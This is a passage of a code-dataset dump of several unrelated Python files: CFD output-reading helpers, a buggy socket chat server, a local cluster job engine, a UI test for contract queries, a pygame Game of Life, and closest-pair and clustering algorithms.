float(bou[30].split()[1])\n self.istr3r = int(bou[30].split()[2])\n self.RayT, self.PraT, self.RayS, self.PraS = [\n float(n) for n in bou[34].split()[:-1]\n ]\n self.FFscaleS = bou[34].split()[-1]==\"1\"\n self.inslwS, self.inslwN, self.TfixS, self.TfixN, self.SfixS, self.SfixN = [\n n!=\"0\" for n in bou[42].split()\n ]\n self.active_T, self.active_S = [\n n!=\"0\" for n in bou[46].split()[:-1]\n ]\n self.gAxis = int(bou[46].split()[-1])\n self.xplusU, self.xminusU, self.dPdy, self.dPdz = [\n float(n) for n in bou[50].replace(\"d\",\"e\").split()[:-1]\n ]\n self.pf_D, self.pf_A, self.pf_S, self.pf_Tm = [\n float(n) for n in bou[54].split()[:4]\n ]\n self.IBM = bou[54].split()[4]!=\"0\"\n self.pf_IC = int(bou[54].split()[-1])\n \n elif len(bou)==24:\n self.nxm, self.nym, self.nzm = [\n int(n) for n in bou[1].split()[:3]\n ]\n self.nxmr, self.nymr, self.nzmr = [\n int(n) for n in bou[3].split()\n ]\n self.tout = float(bou[5].split()[2])\n self.FFscaleS = bou[5].split()[-1]==\"0\"\n self.alx3 = float(bou[7].split()[0])\n self.ylen, self.zlen = [\n float(n) for n in bou[9].split()\n ]\n self.RayT, self.PraT, self.RayS, self.PraS = [\n float(n) for n in bou[11].split()[:4]\n ]\n self.inslwS, self.inslwN, self.TfixS, self.TfixN, self.SfixS, self.SfixN = [\n n!=\"0\" for n in bou[15].split()[:6]\n ]\n self.gAxis = int(bou[15].split()[-1])\n self.xplusU, self.xminusU, self.dPdz = [\n float(n) for n in bou[21].replace(\"d\",\"e\").split()\n ]\n 
self.tframe = float(bou[23].split()[0])\n self.flagsal = True\n\n\n\ndef read_mean(folder, varname):\n \"\"\"\n Returns a 2D array containing the time-series of the wall-normal\n profile of the specified variable `varname`.\n \"\"\"\n with h5py.File(folder+\"/outputdir/means.h5\",\"r\") as f:\n samplist = list(f[varname].keys())\n Nsamp = len(samplist)\n nx = f[varname+\"/\"+samplist[0]].size\n var = np.zeros((nx,Nsamp))\n i = 0\n for num in samplist:\n var[:,i] = f[varname+\"/\"+num][()]\n i = i + 1\n return var\n\ndef read_cut(folder, var, idx, plane):\n \"\"\"\n Returns a 2D slice of sample number `idx` of the variable `var`.\n `plane` can be 'x', 'y', or 'z' and specifies which dimension\n is sliced to obtain the cut. `folder` specifies the root directory\n of the simulation.\n \"\"\"\n varname = var+\"/\"+\"%05d\" % idx\n with h5py.File(folder+\"/outputdir/flowmov/movie_\"+plane+\"cut.h5\",\"r\") as f:\n A = np.array(f[varname][()])\n return A\n\ndef continua_master_from_input(folder, time=0.0):\n \"\"\"\n This function generates the file `continua_master.h5` needed to run\n a simulation from the continua files. Optionally pass the `time` variable\n to set the start time value for the simulation.\n \"\"\"\n # with open(folder+\"/bou.in\", \"r\") as f:\n # for i, line in enumerate(f):\n # if i==2:\n # nxm, nym, nzm = [int(n) for n in line.split()[0:3]]\n # if i==6:\n # nxmr, nymr, nzmr = [int(n) for n in line.split()[1:4]]\n # if i==26:\n # ylen, zlen = [int(n) for n in line.split()[1:3]]\n # if i==30:\n # istr3, str3, istr3r = [float(n) for n in line.split()]\n inputs = InputParams(folder)\n\n with h5py.File(folder+\"/outputdir/continua_master.h5\",\"w\") as f:\n f[\"nx\"], f[\"ny\"], f[\"nz\"] = inputs.nxm + 1, inputs.nym + 1, inputs.nzm + 1\n if inputs.multires:\n f[\"nxr\"], f[\"nyr\"], f[\"nzr\"] = inputs.nxmr + 1, inputs.nymr + 1, inputs.nzmr + 1\n f[\"ylen\"], f[\"zlen\"] = inputs.ylen, inputs.zlen\n f[\"istr3\"], f[\"str3\"] = int(inputs.istr3), inputs.str3\n if inputs.multires: f[\"istr3r\"] = int(inputs.istr3r)\n f[\"time\"] = time\n return\n\ndef write_continua(folder, varname, var):\n \"\"\"\n Generates a continua file for the variable `varname` from the\n data in array `var`.\n \"\"\"\n with h5py.File(folder+\"/outputdir/continua_\"+varname+\".h5\",\"w\") as f:\n f[\"var\"] = var\n return\n\ndef z_vorticity(folder, idx, grid):\n \"\"\"\n Returns a cut of the z-component of vorticity, calculated by the\n derivatives of the vx and vy fields. 
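`read_mean` above returns an (nx, Nsamp) array with one column per saved sample, so a time-averaged wall-normal profile is a single reduction. A usage sketch; the folder path and the variable name 'Tbar' are placeholders, not taken from the module:

```python
import numpy as np

# Usage sketch of the helpers above ('simdir' and 'Tbar' are illustrative):
grid = Grid('simdir')
T = read_mean('simdir', 'Tbar')   # shape (nx, Nsamp)
T_avg = T.mean(axis=1)            # average the profile over saved samples
# plot against the wall-normal grid, e.g. plt.plot(T_avg, grid.xm)
```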
Sample number `idx`, simulation\n directory `folder` and grid data `grid` are needed.\n \"\"\"\n vx = read_cut(folder, \"vx\", idx, \"z\")\n vy = read_cut(folder, \"vy\", idx, \"z\")\n\n dvxdy, dvydx = np.zeros(vx.shape), np.zeros(vy.shape)\n dy = (grid.ym[1] - grid.ym[0])\n\n dvxdy[1:-1,:] = (vx[2:,:] - vx[:-2,:])/2/dy\n dvxdy[0,:] = (vx[1,:] - vx[-1,:])/2/dy\n dvxdy[-1,:] = (vx[0,:] - vx[-2,:])/2/dy\n\n dvydx[:, 1:-1] = (vy[:,2:] - vy[:,:-2])/(grid.xm[2:] - grid.xm[:-2])\n dvydx[:, 0] = (vy[:,1] - 0)/(grid.xm[1] - 0)\n dvydx[:, -1] = (0 - vy[:,-2])/(1 - grid.xm[-2])\n\n dyu = 0.5*(dvxdy[:,1:] + dvxdy[:,:-1])\n\n dxv = np.zeros(vy.shape)\n dxv[:-1,:] = 0.5*(dvydx[1:,:] + dvydx[:-1,:])\n dxv[-1,:] = 0.5*(dvydx[0,:] + dvydx[-1,:])\n\n ζ = dxv - dyu\n\n return ζ","sub_path":"afidtools/afidtools.py","file_name":"afidtools.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"223662269","text":"import socket\nimport threading\nimport sys\nimport os\nfrom queue import Queue\nimport time\n\ns = socket.socket()\nconn = []\nadd = []\nq = Queue()\n\ndef bind():\n s.bind('localhost', 9999)\n print(\"Binding Successful\")\n s.listen(3)\n\ndef accept():\n for i in conn:\n c.close()\n del conn[:]\n del add[:]\n while True:\n c, a = s.accept()\n s.setblocking(1)\n conn.append(c)\n add.append(a)\n print(\"Connection established. IP Address\", a[0], \"Port:\", a[1])\n data = s.recv(1024)\n data = data.decode(\"utf-8\")\n chat(data)\n\ndef chat(data):\n c = get(data)\n if c is not None:\n transfer(conn, data)\n\ndef get(data):\n t = int(data[0])\n c = conn[t]\n return c\n\ndef transfer(c, data):\n r = int(data[2])\n if conn[r] is not None:\n conn[r].send(data[5:] + \" from \" + data[2]).encode(' ')\n else:\n print(\"Recipent not connected\")\n\ndef create_threads():\n t = threading.Thread(target=work())\n t.daemon(True)\n t.start()\n\ndef work():\n for i in 2:\n x = q.get()\n if x == 1:\n create()\n bind()\n accept()\n if x == 2:\n chat()\n q.task_done()\n\ndef create_jobs():\n for x in 2:\n q.put(x)\n q.join()\n\ndef main():\n create_threads()\n create_jobs()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/SocketProgramming/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73672533","text":"#! /usr/bin/env python\nfrom ClusterSubmission.ClusterEngine import ClusterEngine\nfrom ClusterSubmission.Utils import CreateDirectory, ResolvePath, id_generator, getRunningThreads, ReadListFromFile, WriteList, AppendToList\nimport os, time, threading, logging\nlogging.basicConfig(format='%(levelname)s : %(message)s', level=logging.INFO)\n\n\n###############################################################\n## LocalEngine\n## the local engine manages the local submission of the jobs\n## i.e. 
{"seq_id":"73672533","text":"#! /usr/bin/env python\nfrom ClusterSubmission.ClusterEngine import ClusterEngine\nfrom ClusterSubmission.Utils import CreateDirectory, ResolvePath, id_generator, getRunningThreads, ReadListFromFile, WriteList, AppendToList\nimport os, time, threading, logging\nlogging.basicConfig(format='%(levelname)s : %(message)s', level=logging.INFO)\n\n\n###############################################################\n## LocalEngine\n## the local engine manages the local submission of the jobs\n## i.e. many threads are started in parallel\n###############################################################\nclass LocalEngine(ClusterEngine):\n    def __init__(self, jobName=\"\", baseDir=\"\", maxCurrentJobs=-1, singularity_image=\"\", run_in_container=False):\n        ClusterEngine.__init__(self,\n                               jobName=jobName,\n                               baseDir=baseDir,\n                               maxCurrentJobs=maxCurrentJobs,\n                               submit_build=run_in_container,\n                               singularity_image=singularity_image,\n                               run_in_container=run_in_container)\n        self.__threads = []\n        self.__runned_jobs = 0\n\n    def get_threads(self):\n        return self.__threads\n\n    def n_threads(self):\n        return len(self.get_threads())\n\n    def get_array_size(self, task_name=\"\"):\n        return len([x for x in self.get_threads() if x.name() == task_name])\n\n    #### Basic method to submit a job\n    def submit_job(self, script, sub_job=\"\", mem=-1, env_vars=[], hold_jobs=[], run_time=\"\"):\n        ### Memory is senseless in this setup. Do not pipe it further\n        pending_threads, direct_pending = self.get_holding_threads(hold_jobs=hold_jobs)\n        exec_script = self.pack_environment(env_vars, script)\n        if not exec_script: return False\n        self.set_cluster_control_module(\"ClusterSubmission/ClusterControlLOCAL.sh\")\n        self.__threads += [\n            LocalClusterThread(thread_name=self.subjob_name(sub_job),\n                               subthread=-1,\n                               thread_engine=self,\n                               ### a single job has no array index to match against,\n                               ### so it depends on all directly pending holds\n                               ### (the old filter used an undefined `i` -> NameError)\n                               dependencies=pending_threads + direct_pending,\n                               script_exec=exec_script)\n        ]\n        return True\n\n    def get_holding_threads(self, hold_jobs=[]):\n        pending_threads = []\n        direct_pending = []\n        for th in self.get_threads():\n            for hold in self.to_hold(hold_jobs):\n                ### Simple name matching\n                if isinstance(hold, str):\n                    if hold == th.name():\n                        pending_threads += [th]\n                        break\n                elif isinstance(hold, tuple):\n                    if hold[0] == th.name() and th.thread_number() > 0:\n                        if isinstance(hold[1], list):\n                            if th.thread_number() in hold[1]:\n                                pending_threads += [th]\n                                break\n                            elif -1 in hold[1]:\n                                direct_pending += [th]\n                        elif isinstance(hold[1], int) and -1 == hold[1]:\n                            direct_pending += [th]\n        return pending_threads, direct_pending\n\n    def submit_array(self, script, sub_job=\"\", mem=-1, env_vars=[], hold_jobs=[], run_time=\"\", n_cores=1, array_size=-1):\n        if array_size < 1:\n            logging.error(\": Please give a valid array size\")\n            return False\n        pending_threads, direct_pending = self.get_holding_threads(hold_jobs=hold_jobs)\n        exec_script = self.pack_environment(env_vars, script)\n        if not exec_script: return False\n        self.set_cluster_control_module(\"ClusterSubmission/ClusterControlLOCAL.sh\")\n        for i in range(array_size):\n            self.__threads += [\n                LocalClusterThread(thread_name=self.subjob_name(sub_job),\n                                   subthread=i + 1 if array_size > 0 else -1,\n                                   thread_engine=self,\n                                   dependencies=pending_threads + [th for th in direct_pending if th.thread_number() == i + 1],\n                                   script_exec=exec_script)\n            ]\n        return True\n\n    def print_status(self, running):\n        logging.info(\": Executed %d/%d jobs at the moment %d jobs are running\" %\n                     (self.__runned_jobs, self.n_threads(), len(running)))\n        for th in running:\n            if not th.isAlive(): continue  ### skip finished threads instead of aborting the whole report\n            th.print_log_file()\n            time.sleep(0.2)\n\n    def finish(self):\n        CreateDirectory(self.log_dir(), False)\n        CreateDirectory(self.tmp_dir(), False)\n        executable = [th for th in self.get_threads() if th.is_launchable()]\n        running = []\n        dead_jobs = []\n\n        cycles = 0\n        ### There are still some jobs to execute\n        while self.__runned_jobs + len(dead_jobs) < self.n_threads():\n            cycles += 1\n            running = [th for th in running if th.isAlive()]\n            if len(running) < 
self.max_running_per_array():\n                for th in executable:\n                    if len(running) >= self.max_running_per_array(): break\n                    th.start()\n                    self.__runned_jobs += 1\n                    running += [th]\n                executable = [th for th in self.get_threads() if th.is_launchable()]\n            else:\n                ### parenthesize the chain: `and` binds tighter than `or`, so the old\n                ### version kept re-appending jobs that were already in dead_jobs\n                dead_jobs += [th for th in self.get_threads() if (th.is_dead() or th.in_dead_chain()) and th not in dead_jobs]\n                time.sleep(1)\n            if cycles % 120 == 0:\n                self.print_status(running)\n\n        while getRunningThreads(running) > 0:\n            time.sleep(0.5)\n            cycles += 1\n            if cycles % 120 == 0:\n                self.print_status(running)\n\n        ### Need to do something with the dead jobs. At least inform the user\n\n\nclass LocalClusterThread(threading.Thread):\n    def __init__(self, thread_name=\"\", subthread=-1, thread_engine=None, dependencies=[], script_exec=\"\"):\n        threading.Thread.__init__(self)\n        self.__engine = thread_engine\n        self.__name = thread_name\n        self.__sub_num = subthread\n\n        self.__isSuccess = False\n        self.__started = False\n        self.__dependencies = [d for d in dependencies]\n        self.__script_to_exe = script_exec\n        self.__tmp_dir = \"%s/%s\" % (thread_engine.tmp_dir(), id_generator(50))\n        CreateDirectory(self.__tmp_dir, True)\n        self.__env_vars = [(\"LOCAL_TASK_ID\", \"%d\" % (self.thread_number())), (\"TMPDIR\", self.__tmp_dir)]\n\n    def __del__(self):\n        logging.info(\": Clean up %s\" % (self.__tmp_dir))\n        os.system(\"rm -rf %s\" % (self.__tmp_dir))\n\n    def dependencies(self):\n        return self.__dependencies\n\n    def thread_engine(self):\n        return self.__engine\n\n    def thread_number(self):\n        return self.__sub_num\n\n    def name(self):\n        return self.__name\n\n    def is_launchable(self):\n        if self.isAlive() or self.__started or self.in_dead_chain(): return False\n        self.__dependencies = [th for th in self.__dependencies if th.isAlive() or not th.is_started() or not th.is_success()]\n        return len(self.__dependencies) == 0\n\n    def in_dead_chain(self):\n        return len([th for th in self.__dependencies if th.is_dead() or th.in_dead_chain()]) > 0\n\n    def is_dead(self):\n        return not self.isAlive() and self.is_started() and not self.is_success()\n\n    def is_success(self):\n        return self.__isSuccess\n\n    def is_started(self):\n        return self.__started\n\n    def run(self):\n        self.__started = True\n        ###################\n        self.__isSuccess = self._cmd_exec()\n\n    def log_file(self):\n        return \"%s/%s%s.log\" % (self.thread_engine().log_dir(), self.name(), \"\" if self.thread_number() < 1 else \"_%d\" %\n                                (self.thread_number()))\n\n    def print_log_file(self, last_lines=10):\n        if not os.path.exists(self.log_file()): return\n        log_content = ReadListFromFile(self.log_file())\n        n_lines = len(log_content)\n        for i in range(max(0, n_lines - last_lines), n_lines):\n            if self.thread_number() == -1:\n                logging.info(\"<%s> %s\" % (self.name(), log_content[i]))\n            else:\n                logging.info(\n                    \"<%s - %d/%d> %s\" %\n                    (self.name(), self.thread_number(), self.thread_engine().get_array_size(task_name=self.name()), log_content[i]))\n\n    def _cmd_exec(self):\n        if not os.path.exists(self.__script_to_exe):\n            logging.error(\"<_cmd_exec>: Could not find %s\" % (self.__script_to_exe))\n            return False\n        ### Threads can set their own environment variables without affecting the others\n        os.system(\"chmod 0700 %s\" % (self.__script_to_exe))\n        if self.thread_number() == -1:\n            logging.info(\"<_cmd_exec> Start job %s\" % (self.name()))\n        else:\n            logging.info(\"<_cmd_exec> Start task %d/%d in job %s\" %\n                         (self.thread_number(), self.thread_engine().get_array_size(task_name=self.name()), self.name()))\n        cmd_file = 
self.thread_engine().pack_environment(env_vars=self.__env_vars, script=self.__script_to_exe)\n\n        return os.system(\"python %s --Cmd %s > %s 2>&1\" % (ResolvePath(\"ClusterSubmission/exeScript.py\"), cmd_file, self.log_file())) == 0\n","sub_path":"ClusterSubmission/python/LocalEngine.py","file_name":"LocalEngine.py","file_ext":"py","file_size_in_byte":9538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
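The record above shows the engine but not a caller, and the ClusterEngine base class (subjob_name, pack_environment, max_running_per_array, ...) lives elsewhere in the package. A rough, hypothetical driver follows: the import path is guessed from the file layout, the shell scripts are invented, and the "demo_prepare" hold name assumes subjob_name() joins job and sub-job names with an underscore, which this record does not confirm.

from ClusterSubmission.LocalEngine import LocalEngine

# Hypothetical driver; all names and scripts are assumptions.
engine = LocalEngine(jobName="demo", baseDir="/tmp/demo", maxCurrentJobs=4)

# One preparation job, then an 8-task array that waits for it.
engine.submit_job(script="prepare.sh", sub_job="prepare")
engine.submit_array(script="process.sh", sub_job="process",
                    hold_jobs=["demo_prepare"], array_size=8)

# finish() starts the LocalClusterThreads, throttles them to the configured
# maximum, and polls until every thread has run or been parked in a dead chain.
engine.finish()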
{"seq_id":"275653492","text":"#coding=utf-8\nimport sys,time,unittest,xmlrunner,os\nfrom Sys_NCP.PageObj.NCPTest import NCPTest\nfrom Utils.scriptTestCase import scriptTestCase\n\nclass CombinationConditionQuery(unittest.TestCase):\n    '''Contract Management > Contract Query > query feature - combined-condition query'''\n    Screenshotfilepath = \"\"  # receives the screenshot save path for this run\n    s = os.sep\n    sTC = scriptTestCase()\n\n    def setUp(self):\n        pass\n    def testCountManage(self):\n        test = NCPTest()\n        self.Screenshotfilepath = test.get_check_filepath(self.Screenshotfilepath)\n        testdatas = self.sTC.get_ContractQuery_CombinationConditionTestData()\n        # test.login('admin', '88888888')\n        test.defaultLoginInfo()\n        for i in range(0,len(testdatas)):\n            test.go_to_menu('合同管理', '合同查询')  # menu labels must match the UI: Contract Management > Contract Query\n            if testdatas[i]['QueryMethod'] == 'CombinationCondition':\n                countValues = testdatas[i]['LocationValue'].split(',')\n                for j in range(0,len(countValues)):\n                    Queryvalue = countValues[j].split('|')\n                    if Queryvalue[0] == '输入框提示':  # input field located by placeholder\n                        test.input_by_placeholder(Queryvalue[1], Queryvalue[2])\n                    elif Queryvalue[0] == '输入框id':  # input field located by id\n                        test.input_by_id(Queryvalue[1], Queryvalue[2])\n                    elif Queryvalue[0] == '下拉选择框id':  # dropdown located by id\n                        test.select_option_value(Queryvalue[1], Queryvalue[2])\n                    elif Queryvalue[0] == '日期输入框id':  # date picker located by id\n                        test.select_calendar_byId(Queryvalue[1], Queryvalue[2])\n                    elif Queryvalue[0] == '日期输入框提示':  # date picker located by placeholder\n                        test.select_calendar_byId(Queryvalue[1], Queryvalue[2])\n                    else:\n                        print (u'Input parameter format is invalid, please check')\n            else:\n                print (u'Input parameter format is invalid, please check')\n            test.click_button('搜索')  # the \"Search\" button\n            test.saveScreenshot_Path(testdatas[i]['截图名称'], self.Screenshotfilepath)  # screenshot before scrolling ('截图名称' is the screenshot-name key in the test data)\n            test.scroll_saveScreenshot_Path(testdatas[i]['截图名称'], self.Screenshotfilepath, \"tablelist\")  # screenshot after scrolling\n            time.sleep(3)\n            test.close_tab('合同查询')  # close the Contract Query tab\n    def tearDown(self):\n        pass\n\nif __name__ == '__main__':\n    unittest.main(\n        testRunner=xmlrunner.XMLTestRunner(output=sys.path[0] + '/output'),\n        # these make sure that some options that are not applicable\n        # remain hidden from the help menu.\n        failfast=False, buffer=False, catchbreak=False)","sub_path":"Sys_NCP/TestClass/DBCase/CombinationConditionQuery.py","file_name":"CombinationConditionQuery.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"476748241","text":"__author__ = 'kaan'\n\n\nimport pygame, random, os\n\nos.environ['SDL_VIDEO_CENTERED'] = '1'\n\npygame.init()\n\n#Change these\nrect_h = 15\nrect_w = 15\nmargin = 1\nnumber_of_row = 40\nnumber_of_column = 60\n\n\nblack = [0, 0, 0]\nwhite = [255, 255, 255]\nblue = [0, 0, 255]\ngreen = [0, 255, 0]\nred = [255, 0, 0]\n\nclick_sound = pygame.mixer.Sound(\"se3.wav\")\n\nglobal running, start\nrunning = True\nstart = False\n\nfont = pygame.font.Font(None, 25)\ntext1 = font.render(\"Running!\", True, green)\ntext2 = font.render(\"Stand by!\", True, red)\n\nglobal text\ntext = text2\n\nsize = [(rect_w + margin) * number_of_column + margin, (rect_h + margin) * number_of_row + margin]\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Game Of Life || s : start/stop || c : clear || kaanctn\")\nclock = pygame.time.Clock()\n\ngrid = []\nglobal dead_list\ndead_list = []\nglobal born_list\nborn_list = []\n\n\ndef create_matrix():\n    for row in range(number_of_row + 2):\n        grid.append([])\n        for column in range(number_of_column + 2):\n            grid[row].append(0)\n\n\ndef draw():\n    for row in range(number_of_row):\n        for column in range(number_of_column):\n            color = white\n            if grid[row + 1][column + 1] == 1:\n                color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n            pygame.draw.rect(screen, color, [(margin + rect_w) * column + margin, (margin + rect_h) * row + margin, rect_w, rect_h])\n\n\ndef mouse_click():\n    pos = pygame.mouse.get_pos()\n    column = pos[0] // (rect_w + margin) + 1\n    row = pos[1] // (rect_h + margin) + 1\n\n    if row <= number_of_row and row > 0 and column > 0 and column <= number_of_column:\n        #print \"clicked : \", row, column\n        if grid[row][column] == 0:\n            grid[row][column] = 1\n        else:\n            grid[row][column] = 0\n        click_sound.play()\n\n\ndef deadlist():\n    for row in range(number_of_row):\n        for column in range(number_of_column):\n            if grid[row + 1][column + 1] == 1:\n                counter = grid[row][column] + grid[row][column + 1] + grid[row][column + 2] + grid[row + 1][column] + grid[row + 1][column + 2] + grid[row + 2][column] + grid[row + 2][column + 1] + grid[row + 2][column + 2]\n                if counter < 2 or counter > 3:\n                    dead_list.append((row + 1, column + 1))\n\n\ndef bornList():\n    for row in range(number_of_row):\n        for column in range(number_of_column):\n            if grid[row + 1][column + 1] == 0:\n                counter = grid[row][column] + grid[row][column + 1] + grid[row][column + 2] + grid[row + 1][column] + grid[row + 1][column + 2] + grid[row + 2][column] + grid[row + 2][column + 1] + grid[row + 2][column + 2]\n                if counter == 3:\n                    born_list.append((row + 1, column + 1))\n\n\ndef apply_changes():\n    global dead_list, born_list\n\n    for i, j in dead_list:\n        grid[i][j] = 0\n        #print \"killed at: \", i, j\n\n    for i, j in born_list:\n        grid[i][j] = 1\n        #print \"created at: \", i, j\n\n    dead_list = []\n    born_list = []\n\n\ndef clear():\n    global born_list\n    born_list = []\n    global dead_list\n    dead_list = []\n    for row in range(number_of_row):\n        for column in range(number_of_column):\n            grid[row + 1][column + 1] = 0\n\n\ndef main():\n    i = 0\n    c = font.render(str(i), True, red)\n    #asd = number_of_column * (rect_w + margin) - 50\n    create_matrix()\n    global running, start, text\n\n    while running:\n        clock.tick(10)\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                running = False\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                mouse_click()\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_s:\n                    if start == False:\n                        start = True\n                        text = text1\n                    else:\n                        start = False\n                        text = text2\n                    #print \"running : \", start\n                if event.key == pygame.K_c:\n                    clear()\n                if event.key == pygame.K_r:\n                    pass #random_create()\n\n        if start:\n            c = font.render(str(i), True, red)\n            deadlist()\n            bornList()\n            apply_changes()\n            i = i + 1\n\n        screen.fill(black)\n        # DO SOMETHING\n        draw()\n        screen.blit(c, [0, 15])\n        screen.blit(text, [0, 0])\n        pygame.display.flip()\n    pygame.quit()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"gol.py","file_name":"gol.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"193264397","text":"#!/usr/bin/env python\r\n'''\r\nProject 3 - Closest pairs and Clustering algorithms\r\nImplementation of two clustering algorithms - \"HierarchicalClustering\"\r\nand \"KMeansClustering\"\r\nImplementation of two algorithms for computing 
closest pair -\r\n\"slow_closest_pairs\" and \"fast_closest_pair\"\r\n'''\r\n\r\nimport math\r\nfrom alg_cluster import Cluster\r\n\r\n################################################################\r\n# Implementation of two algorithms for computing closest pair -\r\n# \"slow_closest_pairs\" and \"fast_closest_pair\"\r\n################################################################\r\n\r\n\r\ndef pair_distance(cluster_list, idx1, idx2):\r\n    \"\"\"\r\n    Helper function to compute Euclidean distance between two clusters\r\n    in cluster_list with indices idx1 and idx2\r\n\r\n    Returns tuple (dist, idx1, idx2) with idx1 < idx2 where dist is\r\n    distance between cluster_list[idx1] and cluster_list[idx2]\r\n    \"\"\"\r\n    return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2),\r\n            max(idx1, idx2))\r\n\r\n\r\ndef slow_closest_pairs(cluster_list):\r\n    \"\"\"\r\n    Compute the set of closest pairs of clusters in list of clusters\r\n    using O(n^2) all pairs algorithm (brute-force)\r\n\r\n    Returns the set of all tuples of the form (dist, idx1, idx2)\r\n    where the cluster_list[idx1] and cluster_list[idx2] have\r\n    minimum distance dist.\r\n    \"\"\"\r\n    dmin = [(float('inf'), -1, -1)]\r\n    for idx in range(len(cluster_list) - 1):\r\n        for jdx in range(idx + 1, len(cluster_list)):\r\n            dist, idx1, idx2 = pair_distance(cluster_list, idx, jdx)\r\n            # check if this is min distance\r\n            if dist < dmin[0][0]:\r\n                dmin = [(dist, idx1, idx2)]\r\n\r\n            elif dist == dmin[0][0]:\r\n                dmin.append((dist, idx1, idx2))\r\n\r\n    return set(dmin)\r\n\r\n\r\ndef fast_closest_pair(cluster_list):\r\n    \"\"\"\r\n    Compute a closest pair of clusters in cluster_list\r\n    using O(n log(n)) divide and conquer algorithm\r\n\r\n    Returns a tuple (distance, idx1, idx2) with idx1 < idx2 where\r\n    cluster_list[idx1] and cluster_list[idx2]\r\n    have the smallest distance dist of any pair of clusters\r\n    \"\"\"\r\n\r\n    # x-coordinate of every cluster's centre along with cluster id\r\n    x_cord_id = [(item.horiz_center(), idx)\r\n                 for idx, item in enumerate(cluster_list)]\r\n    x_cord_id.sort()\r\n    # clusters sorted as per their x-coordinates\r\n    x_sorted_clusters = [item[1] for item in x_cord_id]\r\n\r\n    # y-coordinate of every cluster's centre along with cluster id\r\n    y_cord_id = [(item.vert_center(), idx)\r\n                 for idx, item in enumerate(cluster_list)]\r\n    y_cord_id.sort()\r\n    # clusters sorted as per their y-coordinates\r\n    y_sorted_clusters = [item[1] for item in y_cord_id]\r\n    answer = fast_helper(cluster_list, x_sorted_clusters, y_sorted_clusters)\r\n    return (answer[0], min(answer[1:]), max(answer[1:]))\r\n\r\n\r\ndef fast_helper(cluster_list, horiz_order, vert_order):\r\n    \"\"\"\r\n    Divide and conquer method for computing distance between\r\n    closest pair of points. Running time is O(n * log(n))\r\n\r\n    horiz_order and vert_order are lists of indices for clusters\r\n    ordered horizontally and vertically\r\n\r\n    Returns a tuple (distance, idx1, idx2) with idx1 < idx2 where\r\n    cluster_list[idx1] and cluster_list[idx2]\r\n    have the smallest distance dist of any pair of clusters\r\n    \"\"\"\r\n\r\n    # base case\r\n    if len(horiz_order) <= 3:\r\n        cluster = []\r\n        for idx in horiz_order:\r\n            cluster.append(cluster_list[idx])\r\n        result = slow_closest_pairs(cluster).pop()\r\n        # get the original index of the cluster object\r\n        return (result[0], horiz_order[result[1]], horiz_order[result[2]])\r\n\r\n    else:\r\n        # divide phase\r\n\r\n        # number of points in each half (integer midpoint, works on Python 2 and 3)\r\n        num = len(horiz_order) // 2\r\n        # horizontal coordinate for vertical dividing 
line\r\n        mid = (cluster_list[horiz_order[num]].horiz_center() +\r\n               cluster_list[horiz_order[num - 1]].horiz_center()) / 2\r\n        horiz_left = [horiz_order[idx] for idx in range(num)]\r\n        horiz_right = [horiz_order[idx]\r\n                       for idx in range(num, len(horiz_order))]\r\n\r\n        # copy to vert_left, in order, the elements of vert_order\r\n        # that are elements of horiz_left\r\n        # copy to vert_right, in order, the elements of vert_order\r\n        # that are elements of horiz_right\r\n        vert_left = []\r\n        vert_right = []\r\n        # build the set once (not per iteration) for constant-time membership checks\r\n        horiz_left_set = set(horiz_left)\r\n        for idx in vert_order:\r\n            if idx in horiz_left_set:\r\n                vert_left.append(idx)\r\n            else:\r\n                vert_right.append(idx)\r\n\r\n        answer_left = fast_helper(cluster_list, horiz_left, vert_left)\r\n        answer_right = fast_helper(cluster_list, horiz_right, vert_right)\r\n\r\n        dist1 = (answer_left[0], min(answer_left[1:]), max(answer_left[1:]))\r\n        dist2 = (answer_right[0], min(answer_right[1:]), max(answer_right[1:]))\r\n\r\n        d_min = dist1 if dist1[0] < dist2[0] else dist2\r\n\r\n        # conquer phase\r\n        # list() so len() and indexing below also work on Python 3\r\n        strip = list(filter(lambda x: math.fabs(cluster_list[x].horiz_center() - mid)\r\n                            < d_min[0], vert_order))\r\n        for idx in range(len(strip) - 1):\r\n            for jdx in range(idx + 1, min(idx + 3, len(strip) - 1) + 1):\r\n                res = pair_distance(cluster_list, strip[idx], strip[jdx])\r\n                d_min = d_min if d_min[0] < res[0] else res\r\n        return d_min\r\n\r\n\r\n###########################################################################\r\n# Implementation of two clustering algorithms - \"HierarchicalClustering\"\r\n# and \"KMeansClustering\"\r\n###########################################################################\r\n\r\ndef hierarchical_clustering(cluster_list, num_clusters):\r\n    '''\r\n    Takes a list of Cluster objects and applies hierarchical clustering\r\n    Returns a list of clusters of desired number\r\n    '''\r\n    while len(cluster_list) > num_clusters:\r\n        # find the closest two clusters\r\n        #res = slow_closest_pairs(cluster_list).pop()\r\n        res = fast_closest_pair(cluster_list)\r\n        # merge clusters into one\r\n        cluster_list[res[1]].merge_clusters(cluster_list[res[2]])\r\n        # since already merged\r\n        cluster_list.pop(res[2])\r\n    return cluster_list\r\n\r\n\r\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\r\n    '''\r\n    Takes a list of Cluster objects and applies kmeans clustering\r\n    Returns a list of clusters of desired number after specific\r\n    number of operations\r\n    '''\r\n    # initialize num_clusters centers\r\n    # use the centers of those clusters which have the largest populations\r\n    populations = [(item.total_population(), idx)\r\n                   for idx, item in enumerate(cluster_list)]\r\n    populations.sort()\r\n    centers = []\r\n    populations = populations[-num_clusters:]\r\n    for item in populations:\r\n        